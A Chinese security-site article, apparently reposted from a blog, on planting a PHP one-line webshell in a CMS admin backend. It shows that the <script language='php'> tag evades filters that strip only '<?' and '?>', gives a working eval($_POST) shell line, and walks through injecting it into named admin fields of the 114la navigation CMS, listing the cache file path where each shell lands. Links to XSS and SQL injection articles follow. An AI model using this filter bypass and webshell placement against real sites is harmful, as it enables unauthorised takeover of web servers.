php后台插一句话后门的思路分享
所属分类:
网络安全 / 脚本攻防
阅读数:
1051
收藏 0赞 0分享
首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
的时候往往都是以
“<?,?>”
这两个关键字进行替换或过滤的!所以这种标签在后台插马
的时候用处还是很大的!PS:就是应为使用量不大,就不重视!这样能行吗?
实战:114啦导航准备我们的一句话代码:利用script的标签代码:
<script language="php">eval ($_POST[1]);</script>
首先后台我跟晴天那家伙已经看完了。他自己的方法也没拿下shell模版目录权限是只读!你们懂的!
这里的方法就是利用缓存拿shell.这个方法是以前公布出来的。作者具体就不知道是谁了(转载乱了)
–官方以及把这里修补了,但是修补方法很马虎!就是我之前说的过滤关键字只有
<? ?>
所以这里我们可以利用 我们准备好的script格式的php一句话代码插入!
名站首行:
HTML内输入一句话,提交后一句话木马位于admin/data/cache/cache_mztop.php
名站轮播:
站点网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_loop.php
名站切换:
ifreme网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_tab.php
首页实用工具:
工具网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_index_tool.php
本文来源于:半坑土农民'S Blog
浅谈史上最大DDoS攻击的本质与防范
DDos攻击是现在大部分用户最喜欢的一个话题,近两年来发展态势也渐趋平缓,欧洲反垃圾邮件组织Spamhaus突然遭受到高达300Gbps的大流量DDos攻击被认为是史上最大DDoS攻击,下面小编带你一起分析分析
收藏 0赞 0分享
XSS绕过技术 XSS插入绕过一些方式总结
我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式
收藏 0赞 0分享
一句话木马后门在防注入中的重生
对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为ASP的文件中,这也给了我们一些可利用的地方
收藏 0赞 0分享
ASP+PHP 标准sql注入语句(完整版)
这里为大家分享一下sql注入的一些语句,很多情况下由于程序员的安全意识薄弱或基本功不足就容易导致sql注入安全问题,建议大家多看一下网上的安全文章,最好的防范就是先学会攻击
收藏 0赞 0分享
thinkphp代码执行getshell的漏洞解决
本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0赞 0分享
XSS攻击常识及常用脚本
XSS 攻击常用脚本,大家可以了解xss攻击的一些知识做好网站安全防范。
收藏 0赞 0分享
查看更多